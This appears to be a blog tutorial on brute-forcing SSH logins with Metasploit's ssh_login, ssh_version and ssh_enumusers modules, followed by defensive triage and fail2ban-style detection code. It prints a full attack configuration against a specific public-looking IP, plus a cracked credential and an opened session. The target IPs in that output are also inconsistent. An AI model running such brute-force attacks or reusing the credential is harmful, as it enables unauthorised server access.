SSH Login Brute Force with scanner/ssh/ssh_login
SSH (Secure Shell) is a network protocol used to secure communication between two systems, especially over untrusted networks such as the internet. SSH lets users log in to remote systems, manage files, and execute commands over the network securely. It is widely used by system administrators and developers to manage servers, routers, and other network devices.
Key SSH features:
- Security: SSH encrypts all data transmitted between client and server, including commands, files and other data, protecting it from interception by third parties.
- Authentication: SSH supports several authentication methods, such as passwords, public keys, and certificate-based authentication.
- Remote management: SSH allows remote management of systems through the command line or a graphical session (for example with X11 forwarding).
- Port forwarding: SSH supports tunneling (port forwarding), letting users protect traffic from protocols that are not encrypted themselves.
- Secure file transfer: SCP (Secure Copy) and SFTP (SSH File Transfer Protocol) are used to send and receive files securely over SSH.
Several Metasploit (msfconsole) modules shipped with Kali Linux, such as scanner/ssh/ssh_login, scanner/ssh/ssh_version and scanner/ssh/ssh_enumusers, can be used to measure how well an SSH server holds up against attack.
SSH Login Brute Force
An SSH login brute force can be run with the scanner/ssh/ssh_login module. It is best to already have a valid username, so that only the password list (PASS_FILE) needs to be prepared; otherwise the module has to guess both, which multiplies the number of attempts. Below are the settings we use for the attack.
Basic options:

  Name              Current Setting              Required  Description
  ----              ---------------              --------  -----------
  ANONYMOUS_LOGIN   false                        yes       Attempt to login with a blank username and password
  BLANK_PASSWORDS   false                        no        Try blank passwords for all users
  BRUTEFORCE_SPEED  5                            yes       How fast to bruteforce, from 0 to 5
  CreateSession     true                         no        Create a new session for every successful login
  DB_ALL_CREDS      false                        no        Try each user/password couple stored in the current database
  DB_ALL_PASS       false                        no        Add all passwords in the current database to the list
  DB_ALL_USERS      false                        no        Add all users in the current database to the list
  DB_SKIP_EXISTING  none                         no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
  PASSWORD                                       no        A specific password to authenticate with
  PASS_FILE         /Users/user/Desktop/pwd.txt  no        File containing passwords, one per line
  RHOSTS            103.170.210.160              yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
  RPORT             22                           yes       The target port
  STOP_ON_SUCCESS   true                         yes       Stop guessing when a credential works for a host
  THREADS           1                            yes       The number of concurrent threads (max one per host)
  USERNAME          root                         no        A specific username to authenticate as
  USERPASS_FILE                                  no        File containing users and passwords separated by space, one pair per line
  USER_AS_PASS      false                        no        Try the username as the password for all users
  USER_FILE                                      no        File containing usernames, one per line
  VERBOSE           true                         yes       Whether to print output for all attempts
Output when a guess succeeds. Note the id output on the Success line: the matched "root" account has uid 1000 and is a member of the sudo group, so it is an ordinary user named root (with sudo rights), not the real root account (uid 0). Also note the "No active DB" warning: without a connected database the found credential is not stored, so copy it from the output.
msf6 auxiliary(scanner/ssh/ssh_login) > run

[*] 103.175.220.161:22 - Starting bruteforce
[-] 103.175.220.161:22 - Failed: 'bejopamungkas:565656565'
[!] No active DB -- Credential data will not be saved!
[-] 103.175.220.161:22 - Failed: 'root:sdsdsdsds'
[-] 103.175.220.161:22 - Failed: 'root:Password'
[-] 103.175.220.161:22 - Failed: 'root:http'
[-] 103.175.220.161:22 - Failed: 'root:factory'
[-] 103.175.220.161:22 - Failed: 'root:RIP000'
[-] 103.175.220.161:22 - Failed: 'root:12345'
[-] 103.175.220.161:22 - Failed: 'root:1234admin'
[-] 103.175.220.161:22 - Failed: 'root:ANYCOM'
[-] 103.175.220.161:22 - Failed: 'root:ILMI'
[+] 103.175.220.161:22 - Success: 'root:rootadmin' 'uid=1000(root) gid=1000(root) groups=1000(root),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),118(netdev),119(lxd) '
[*] SSH session 1 opened (192.168.0.102:49955 -> 103.170.210.160:22) at 2024-09-19 08:58:26 +0700
[-] 103.170.210.160:22 - While a session may have opened, it may be bugged. If you experience issues with it, re-run this module with 'set gatherproof false'. Also consider submitting an issue at github.com/rapid7/metasploit-framework with device details so it can be handled in the future.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Getting the SSH Server Version
We can also gather information about the SSH server version with the scanner/ssh/ssh_version module. Example with the following settings:
msf6 auxiliary(scanner/ssh/ssh_version) > info

       Name: SSH Version Scanner
     Module: auxiliary/scanner/ssh/ssh_version
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Daniel van Eeden <metasploit@myname.nl>
  h00die

Check supported: No

Basic options:
  Name             Current Setting  Required  Description
  ----             ---------------  --------  -----------
  EXTENDED_CHECKS  true             yes       Check for cryptographic issues
  RHOSTS           103.170.210.160  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
  RPORT            22               yes       The target port
  THREADS          1                yes       The number of concurrent threads (max one per host)
  TIMEOUT          30               yes       Timeout for the SSH probe

Description:
  Detect SSH Version, and the server encryption

References:
  https://en.wikipedia.org/wiki/SecureShell
  https://datatracker.ietf.org/doc/html/rfc8732#name-deprecated-algorithms
  https://datatracker.ietf.org/doc/html/draft-ietf-curdle-ssh-kex-sha2-20#page-16
  https://datatracker.ietf.org/doc/html/rfc8758#name-iana-considerations
  https://github.com/net-ssh/net-ssh?tab=readme-ov-file#supported-algorithms
  https://nvd.nist.gov/vuln/detail/CVE-2008-5161

View the full module info with the info -d command.
The result gives us the SSH server version and, because EXTENDED_CHECKS is on, the algorithms the server offers (the module annotates the ones it considers weak, here ecdsa-sha2-nistp256):
msf6 auxiliary(scanner/ssh/ssh_version) > run

[*] 103.170.210.160 - Key Fingerprint: ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBDVFMVPOhhhzOeLgNXDtRGZJyxiOgjz2J0g5HUS8q+r
[*] 103.170.210.160 - SSH server version: SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.10
[*] 103.170.210.160 - Server Information and Encryption
=================================

  Type                     Value                                  Note
  ----                     -----                                  ----
  encryption.compression   none
  encryption.compression   zlib@openssh.com
  encryption.encryption    aes256-gcm@openssh.com
  encryption.encryption    chacha20-poly1305@openssh.com
  encryption.encryption    aes128-ctr
  encryption.encryption    aes256-ctr
  encryption.encryption    aes192-ctr
  encryption.encryption    aes128-gcm@openssh.com
  encryption.hmac          hmac-sha1-etm@openssh.com
  encryption.hmac          umac-128@openssh.com
  encryption.hmac          hmac-sha2-256
  encryption.hmac          hmac-sha2-512
  encryption.hmac          hmac-sha1
  encryption.hmac          umac-128-etm@openssh.com
  encryption.hmac          hmac-sha2-256-etm@openssh.com
  encryption.hmac          hmac-sha2-512-etm@openssh.com
  encryption.hmac          umac-64@openssh.com
  encryption.hmac          umac-64-etm@openssh.com
  encryption.host_key      rsa-sha2-512
  encryption.host_key      rsa-sha2-256
  encryption.host_key      ecdsa-sha2-nistp256                    Weak elliptic curve
  encryption.host_key      ssh-ed25519
  encryption.key_exchange  diffie-hellman-group18-sha512
  encryption.key_exchange  curve25519-sha256
  encryption.key_exchange  curve25519-sha256@libssh.org
  encryption.key_exchange  ecdh-sha2-nistp256
  encryption.key_exchange  ecdh-sha2-nistp384
  encryption.key_exchange  ecdh-sha2-nistp521
  encryption.key_exchange  sntrup761x25519-sha512@openssh.com
  encryption.key_exchange  diffie-hellman-group-exchange-sha256
  encryption.key_exchange  diffie-hellman-group16-sha512
  encryption.key_exchange  diffie-hellman-group14-sha256
  encryption.key_exchange  kex-strict-s-v00@openssh.com
  fingerprint_db           ssh.banner
  openssh.comment          Ubuntu-3ubuntu0.10
  os.certainty             0.75
  os.cpe23                 cpe:/o:canonical:ubuntu_linux:-
  os.family                Linux
  os.product               Linux
  os.vendor                Ubuntu
  service.cpe23            cpe:/a:openbsd:openssh:8.9p1
  service.family           OpenSSH
  service.product          OpenSSH
  service.protocol         ssh
  service.vendor           OpenBSD
  service.version          8.9p1

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
If the version falls in the affected range, we can follow https://blog.bitnami.com/2024/07/regresshion-code-execution.html. Check the distribution patch level and not only the upstream number, though: the affected upstream range is 8.5p1 up to (not including) 9.8p1, but distributions backport fixes without changing that number, and the Ubuntu 22.04 build seen in this banner (8.9p1 Ubuntu-3ubuntu0.10, package 1:8.9p1-3ubuntu0.10) is the release that shipped the CVE-2024-6387 fix in USN-6859-1. A bare "8.9p1" banner from that build therefore does not indicate an exploitable server.
regreSSHion: Code Execution Vulnerability in OpenSSH server (CVE-2024-6387)
You can use the following tools to run the exploit.
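Before reaching for any exploit, the banner should be triaged the way the previous paragraph describes. The following Python is an added example, not code from this page, from Metasploit or from the regreSSHion write-up: it reads the server identification line the way ssh_version does, parses the OpenSSH version, checks it against the upstream ranges given in the Qualys advisory for CVE-2024-6387, and refuses to call a vendor build vulnerable on the upstream number alone. The KNOWN_BACKPORTED_FIXES table is an assumption of this example and only contains the Ubuntu 22.04 build from the banner above (USN-6859-1); the "ExampleDistro-1" banner used for illustration is made up.

```python
import re
import socket

# Upstream OpenSSH releases affected by CVE-2024-6387 (regreSSHion) according to the
# Qualys advisory: everything before 4.4p1 (unless patched for CVE-2006-5051) and
# 8.5p1 up to, but not including, 9.8p1. Releases 4.4p1 .. 8.4p1 are not affected.
# Versions are (major, minor, portable-patch) tuples, so 8.9p1 is (8, 9, 1).
REGRESSHION_RANGES = [((0, 0, 0), (4, 4, 0)), ((8, 5, 0), (9, 8, 0))]

# Distribution builds that keep an "affected" upstream number but carry a backported
# fix. Only the entry for the banner seen on this page is filled in (Ubuntu 22.04,
# package 1:8.9p1-3ubuntu0.10, USN-6859-1); extend it from the vendor advisories.
KNOWN_BACKPORTED_FIXES = {
    ((8, 9, 1), "Ubuntu-3ubuntu0.10"): "USN-6859-1",
}

BANNER_RE = re.compile(
    r"^SSH-(?P<proto>\d+\.\d+)-OpenSSH_(?P<major>\d+)\.(?P<minor>\d+)(?:p(?P<patch>\d+))?"
    r"(?:\s+(?P<comment>\S.*))?$")


def grab_banner(host, port=22, timeout=5.0):
    """Read the server identification line (RFC 4253 section 4.2), which is the
    'SSH server version' that ssh_version prints. OpenSSH sends it as soon as the
    TCP connection is up, so nothing has to be sent first."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        stream = sock.makefile("rb")
        for _ in range(16):  # a server may send a few non-SSH lines before the banner
            line = stream.readline(256).decode("utf-8", "replace").strip()
            if line.startswith("SSH-"):
                return line
    raise ValueError("no SSH identification line from %s:%d" % (host, port))


def parse_banner(banner):
    """Split 'SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.10' into the version tuple and
    the vendor comment; returns None for non-OpenSSH or unparseable banners."""
    m = BANNER_RE.match(banner.strip())
    if not m:
        return None
    version = (int(m.group("major")), int(m.group("minor")), int(m.group("patch") or 0))
    return {"version": version, "comment": m.group("comment") or ""}


def regresshion_triage(banner):
    """Classify a banner for CVE-2024-6387. Returns (status, detail)."""
    info = parse_banner(banner)
    if info is None:
        return ("not_openssh", banner.strip())
    version, comment = info["version"], info["comment"]
    if not any(lo <= version < hi for lo, hi in REGRESSHION_RANGES):
        return ("not_affected", "upstream version outside the affected ranges")
    advisory = KNOWN_BACKPORTED_FIXES.get((version, comment))
    if advisory:
        return ("fixed", advisory)
    if comment:
        # A vendor build: the upstream number alone cannot decide it. Check the
        # distro changelog or advisory before spending time on an exploit.
        return ("affected_unless_backported", comment)
    return ("affected", "upstream build in the affected range")


if __name__ == "__main__":
    import sys
    # with a host argument the banner is fetched live; without one the banner from
    # the ssh_version output above is triaged offline
    target = grab_banner(sys.argv[1]) if len(sys.argv) > 1 else "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.10"
    print(target, "->", regresshion_triage(target))
```

Run it as `python3 triage.py 103.170.210.160` against a host you are authorised to test, or with no argument to see the offline verdict for the banner above, which comes back as fixed (USN-6859-1). A plain upstream build such as 9.7p1 is reported as affected, 9.8p1 and 8.4p1 as not affected, and an unknown vendor build as "affected_unless_backported", which is the honest answer until the distro changelog has been read.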
User Enumeration
For user enumeration you can use the scanner/ssh/ssh_enumusers module, but it sometimes works and sometimes does not: https://github.com/rapid7/metasploit-framework/issues/15676. The module relies on the OpenSSH username enumeration bug CVE-2018-15473 (a malformed public-key userauth request is answered differently for valid and invalid users, with a timing-based variant as fallback), which affects OpenSSH up to 7.7, so against the 8.9p1 server above it is not expected to work. The issue notes:
This technique will not work on modules which do not have public key authentication enabled.
Mitigation
To mitigate brute force attacks we can limit login attempts with a tool called fail2ban, written in Python. It reads the authentication log, counts failed logins per source address, and when an address fails repeatedly within a short time it blocks that IP address with a firewall rule for a while. Keep in mind that this only slows guessing down from one address: a credential as weak as root:rootadmin stays guessable from another address, so key-based authentication (PasswordAuthentication no) and not exposing an administrative account over SSH remain the primary fixes.
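As an added example (not code from this page and not fail2ban itself), the following Python replays sshd log lines through the rule fail2ban's sshd jail applies by default (maxretry = 5 failures within findtime = 10 minutes earns a bantime = 10 minute ban) and also flags what a ban list does not show: a login that succeeded after failures from the same address, i.e. a guess that worked. The log lines are constructed; the 103.175.220.161 address and the usernames mirror the Metasploit run above, while 203.0.113.9 and 198.51.100.7 are documentation addresses and all timestamps are made up.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample of sshd lines in the syslog format found in /var/log/auth.log.
SAMPLE_AUTH_LOG = """\
Sep 19 08:00:00 srv sshd[1901]: Failed password for root from 203.0.113.9 port 50001 ssh2
Sep 19 08:15:00 srv sshd[1902]: Failed password for root from 203.0.113.9 port 50002 ssh2
Sep 19 08:30:00 srv sshd[1903]: Failed password for root from 203.0.113.9 port 50003 ssh2
Sep 19 08:45:00 srv sshd[1904]: Failed password for root from 203.0.113.9 port 50004 ssh2
Sep 19 08:58:20 srv sshd[2101]: Failed password for invalid user bejopamungkas from 103.175.220.161 port 49950 ssh2
Sep 19 08:58:21 srv sshd[2103]: Failed password for root from 103.175.220.161 port 49951 ssh2
Sep 19 08:58:21 srv sshd[2105]: Failed password for root from 103.175.220.161 port 49952 ssh2
Sep 19 08:58:22 srv sshd[2107]: Failed password for root from 103.175.220.161 port 49953 ssh2
Sep 19 08:58:23 srv sshd[2109]: Failed password for root from 103.175.220.161 port 49954 ssh2
Sep 19 08:58:24 srv sshd[2111]: Failed password for root from 103.175.220.161 port 49955 ssh2
Sep 19 08:58:26 srv sshd[2113]: Accepted password for root from 103.175.220.161 port 49956 ssh2
Sep 19 09:00:00 srv sshd[1905]: Failed password for root from 203.0.113.9 port 50005 ssh2
Sep 19 09:30:00 srv sshd[2200]: Failed password for admin from 198.51.100.7 port 40001 ssh2
Sep 19 09:45:00 srv sshd[2201]: Failed password for admin from 198.51.100.7 port 40002 ssh2
"""

LINE_RE = re.compile(r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: (?P<msg>.*)$")
AUTH_RE = re.compile(
    r"^(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+ ssh2")


def parse_ts(text):
    # syslog lines carry no year; all lines are assumed to belong to one year (the
    # parsed value gets year 1900), which is enough for the time differences below
    return datetime.strptime(text, "%b %d %H:%M:%S")


def iter_auth_events(log_text):
    """Yield (timestamp, result, user, ip) for every sshd auth line that matches."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        a = AUTH_RE.match(m.group("msg"))
        if a:
            yield parse_ts(m.group("ts")), a.group("result"), a.group("user"), a.group("ip")


def detect_bans(log_text, maxretry=5, findtime=600, bantime=600):
    """Replay the log with the sshd jail's default semantics: maxretry failures from one
    address inside a sliding findtime window trigger a ban of bantime seconds.
    Returns [(ip, ban_start), ...] in log order."""
    recent = defaultdict(deque)   # ip -> timestamps of failures inside the window
    banned_until = {}             # ip -> when the firewall rule would be removed
    bans = []
    for ts, result, _user, ip in iter_auth_events(log_text):
        if ts < banned_until.get(ip, ts):
            continue              # a real ban drops the packets, so sshd logs nothing
        if result != "Failed":
            continue
        window = recent[ip]
        window.append(ts)
        while (ts - window[0]).total_seconds() > findtime:
            window.popleft()
        if len(window) >= maxretry:
            bans.append((ip, ts))
            banned_until[ip] = ts + timedelta(seconds=bantime)
            window.clear()
    return bans


def successful_after_failures(log_text, findtime=600):
    """Accepted logins that followed failures from the same address within findtime:
    the case an incident responder cares about most. Returns [(ip, user, ts), ...]."""
    failures = defaultdict(deque)
    hits = []
    for ts, result, user, ip in iter_auth_events(log_text):
        window = failures[ip]
        while window and (ts - window[0]).total_seconds() > findtime:
            window.popleft()
        if result == "Failed":
            window.append(ts)
        elif window:
            hits.append((ip, user, ts))
    return hits


if __name__ == "__main__":
    for ip, when in detect_bans(SAMPLE_AUTH_LOG):
        print("ban   %-16s at %s" % (ip, when.strftime("%b %d %H:%M:%S")))
    for ip, user, when in successful_after_failures(SAMPLE_AUTH_LOG):
        print("ALERT %-16s logged in as %s at %s after failed guesses" % (ip, user, when.strftime("%H:%M:%S")))
```

The equivalent fail2ban configuration is an `[sshd]` section in jail.local with `enabled = true`, `maxretry = 5`, `findtime = 10m` and `bantime = 10m`. With the sample above, 103.175.220.161 is banned at its fifth failure (08:58:23), so in a real deployment the sixth guess and the successful login two seconds later would never have reached sshd. The 203.0.113.9 lines show why findtime matters: five failures fifteen minutes apart never trip the default window but do with `findtime = 1h`. Per-address counting also says nothing about a slow guess spread across many source addresses, which is one more reason to remove password authentication rather than rely on the ban alone.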
fail2ban will be covered in the next post.